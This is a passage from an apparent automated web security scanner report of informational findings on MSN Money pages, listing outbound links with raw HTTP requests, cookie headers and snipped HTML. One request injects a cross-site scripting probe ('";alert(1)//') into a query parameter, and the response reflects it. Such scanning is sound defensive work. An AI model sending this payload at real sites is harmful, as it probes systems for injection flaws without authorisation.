<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410680&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A01:65.54.150.51:01/30/2011 10:04:40 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.224. http://redacted/investor/charts/chartdl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(1)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:08:16 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296400096&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A02:65.54.150.52:01/30/2011 07:08:16 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.225. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s=&o=&p=0&tab=mkt HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:12:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 65192


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353575&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&s=&o=&p=0&tab=mkt&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A02:65.54.150.52:01/29/2011 18:12:55 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.226. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:02:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410533&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&p=0&tab=mkt&s=ytd&o=d&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A04:65.54.150.54:01/30/2011 10:02:13 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.227. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s=&o=&p=0&tab=mkt HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:02:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 65192


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410534&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&s=&o=&p=0&tab=mkt&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A02:65.54.150.52:01/30/2011 10:02:14 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.228. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
